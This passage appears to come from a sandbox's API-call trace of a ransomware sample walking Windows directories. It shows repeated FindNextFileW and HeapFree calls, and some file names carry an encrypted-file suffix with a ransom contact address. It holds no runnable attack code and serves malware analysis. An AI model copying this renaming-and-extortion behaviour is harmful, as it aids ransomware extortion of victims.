nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2052", cAlternateFileName="")) returned 1 [0178.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.385] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2070", cAlternateFileName="")) returned 1 [0178.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.387] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3076", cAlternateFileName="")) returned 1 [0178.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.389] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3082", cAlternateFileName="")) returned 1 [0178.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.390] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Client", cAlternateFileName="")) returned 1 [0178.392] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.392] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdec93ef, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdec93ef, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe020920, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3ff4, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DHtmlHeader.html.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DHTMLH~1.BAT")) returned 1 [0178.394] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.394] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0178.397] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.397] FindNextFileW (in: hFindFile=0x69a7f0, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfed69f3e, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf18, dwReserved0=0x0, dwReserved1=0x240000, cFileName="header.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="HEADER~1.BAT")) returned 1 [0178.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0178.398] FindNextFileW (in: hFindFile=0x69a730, lpFindFileData=0x39dfcf8 | out: lpFindFileData=0x39dfcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6fa258, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77850000, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0178.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.398] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0178.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.399] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0178.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.399] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0178.399] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.399] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0178.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.400] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-GB", cAlternateFileName="")) returned 1 [0178.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.400] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.400] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0178.400] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.400] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="es-MX", cAlternateFileName="")) returned 1 [0178.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.401] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="et-EE", cAlternateFileName="")) returned 1 [0178.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.401] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0178.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.401] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0178.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.404] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0178.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.404] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0178.404] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.404] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0178.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.405] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0178.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.405] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="it-IT", cAlternateFileName="")) returned 1 [0178.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.405] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0178.405] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.406] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0178.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.406] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0178.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.406] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0178.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.406] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0178.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.406] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0178.406] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.406] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0178.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.407] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0178.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.407] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0178.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.407] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0178.407] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.407] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0178.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43a3070 | out: hHeap=0x680000) returned 1 [0178.409] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39df800 | out: lpFindFileData=0x39df800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ac01e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9baa67, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0178.409] FindClose (in: hFindFile=0x43a3018 | out: hFindFile=0x43a3018) returned 1 [0178.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.409] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0178.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.409] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0178.409] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4390058 | out: hHeap=0x680000) returned 1 [0178.409] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dfa7c | out: lpFindFileData=0x39dfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0178.409] HeapFree (in: hHeap=0x680000, 